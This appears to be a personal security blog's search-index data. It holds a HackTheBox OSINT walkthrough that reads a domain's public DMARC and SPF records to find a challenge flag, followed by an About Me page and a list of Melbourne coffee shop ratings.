Search term: ‘prevent phishing domain’.\nAfter clicking on the first link, Microsoft suggests implementing Domain-based Message Authentication, Reporting, and Conformance (DMARC) and mentions other related technologies such as Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM). Great, we now have some records which we can look up against the domain to see if they have been implemented properly.\nAfter googling ‘DMARC record lookup’, I came across dmarcanalyzer.com, which gave the following information:\nWith the information above, we can identify two valid tags; however, there is an unknown tag that looks like it could be the second half of a flag, given its ‘}’ ending, so we will store this in our notes for now. With no other information left to extract from the DMARC results, we will now do an SPF record check and see what information may be available there.\nUsing similar search terms as for DMARC, we will google ‘SPF record lookup’, which gives various tools, such as mxtoolbox.com, which gives the following output:\nWith the output above, we now have the first part of the flag, which, combined with the second part from the DMARC record, gives us the complete flag of:\nThis challenge encourages users to look at publicly available information for intelligence gathering, in order to determine where a fault may lie in a system. This information can be used by the blue team to secure a system or by the red team to try to breach a system.\n","permalink":"/blog/easy-phish-hackthebox/","summary":"Easy Phish is an Open Source Intelligence (OSINT) challenge on hackthebox.eu, which provides the challenge flag through publicly available information. 
This walk-through will provide step-by-step instructions on how that flag can be obtained.\nCustomers of secure-startup.com have been receiving some very convincing phishing emails, can you figure out why?\nWith the challenge brief above, three main points can be identified:\nThe scope of the target is the secure-startup.com domain and/or other related entities.","title":"Easy Phish - HackTheBox"},{"content":"I am an energetic person who has developed a mature and responsible approach to any task I undertake. I take pride in my attention to detail and ability to effectively maintain my time. I have a clear and logical approach to problem solving and a drive to see things through to completion.\nMy work involves responding to security incidents and events, as well as engineering automation and tooling for security response. I also dabble in threat hunting, malware analysis and digital forensics. Outside of that, you can find me trawling the Internet for ‘interesting’ findings or testing new tools and technology.\nIf you would like to get in touch, I can be contacted at me(at)sakshamanand.com. My PGP key is available here.\n","permalink":"/about/","summary":"I am an energetic person who has developed a mature and responsible approach to any task I undertake. I take pride in my attention to detail and ability to effectively maintain my time. 
I have a clear and logical approach to problem solving and a drive to see things through to completion.\nMy work involves responding to security incidents and events, as well as engineering automation and tooling for security response.","title":"About Me"},{"content":" Tier Coffee Shop S Patricia Rosso Warkop A Manchester Press Pellegrini's Code Black Brother Baba Budan Market Lane Hikari Sargon Cafe Short Stop Morrow ONA in.btwn Regulars Roasting Warehouse OMO OPPEN B Heirloom Seed Dukes Coffee The League of Honest Coffee Axil Romanello Lune Overlay Juniper Cafe OKO Cafe Proud Mary INI Coffee Maker Four7Six Yilufa Coffee Co Moment Coffee Shelter Cafe Montesanto Coffee Rudimentary Beach Cafe Seaford Mount Macedon Trading Post Red Bean Coffee Roaster El Parche Coffee Roasters Cafe C The Worker's Food Room Commonplace Coffee Federal Coffee Little League Operator25 Kings and Knaves Espresso House Blend Vacation Coffee Traveller Coffee Industry Beans Come Back to Earth Coffee Bench Coffee Co Upstanding Citizens The Ritz-Carlton Lounge Padre Coffee Zuppa Brioche by Philip Higher Ground KOI Schmucks Bagels Culpa Espresso Project Zero Brick Lane Krimper Cafe Pie in the Sky Proserpina Bakehouse Otherside Coffee il caffè by Jerry Lee Cafe Court Operator Coffee People's Coffee JollyGood Sloppy Joe's Puzzle Coffee Encanto Amie Bakery Dusty Fox Cafe Beach Shack Elwood Bammi Local Rules Cafe OMI 380 Glass Den Cafe Airflow Coffee House of Fras Miss Maple's Tearoom HER Cafe Calmer Cafe Poyntons Nursery Fairfield Park Boathouse Bowery to Williamsburg WYM Geelong Brother Hen The Meeting Pool Cafe cup&cozy Peck Roads Caps Cafe MAZI Moons Licensed Espresso Bar HAH Lornebeach The Salty Dog Cafe Specialty Coffee Army Southern Society Dark Horse Cafe Tick Tok Too Good Bakers Peregrine Social Club Benji's in Sassafras Strudel's Cafe D Hangar Cafe The Bond Store Wharf Shed Cafe Oliver's Patisserie & Cafe ","permalink":"/coffee/","summary":" Tier Coffee Shop S Patricia 
Rosso Warkop A Manchester Press Pellegrini's Code Black Brother Baba Budan Market Lane Hikari Sargon Cafe Short Stop Morrow ONA in.btwn Regulars Roasting Warehouse OMO OPPEN B Heirloom Seed Dukes Coffee The League of Honest Coffee Axil Romanello Lune Overlay Juniper Cafe OKO Cafe Proud Mary INI Coffee Maker Four7Six Yilufa Coffee Co Moment Coffee Shelter Cafe Montesanto Coffee Rudimentary Beach Cafe Seaford Mount Macedon Trading Post Red Bean Coffee Roaster El Parche Coffee Roasters Cafe C The Worker's Food Room Commonplace Coffee Federal Coffee Little League Operator25 Kings and Knaves Espresso House Blend Vacation Coffee Traveller Coffee Industry Beans Come Back to Earth Coffee Bench Coffee Co Upstanding Citizens The Ritz-Carlton Lounge Padre Coffee Zuppa Brioche by Philip Higher Ground KOI Schmucks Bagels Culpa Espresso Project Zero Brick Lane Krimper Cafe Pie in the Sky Proserpina Bakehouse Otherside Coffee il caffè by Jerry Lee Cafe Court Operator Coffee People's Coffee JollyGood Sloppy Joe's Puzzle Coffee Encanto Amie Bakery Dusty Fox Cafe Beach Shack Elwood Bammi Local Rules Cafe OMI 380 Glass Den Cafe Airflow Coffee House of Fras Miss Maple's Tearoom HER Cafe Calmer Cafe Poyntons Nursery Fairfield Park Boathouse Bowery to Williamsburg WYM Geelong Brother Hen The Meeting Pool Cafe cup&cozy Peck Roads Caps Cafe MAZI Moons Licensed Espresso Bar HAH Lornebeach The Salty Dog Cafe Specialty Coffee Army Southern Society Dark Horse Cafe Tick Tok Too Good Bakers Peregrine Social Club Benji's in Sassafras Strudel's Cafe D Hangar Cafe The Bond Store Wharf Shed Cafe Oliver's Patisserie & Cafe ","title":"Melbourne Coffee Ratings"},{"content":"","permalink":"/public_key/","summary":"","title":"PGP Key"}]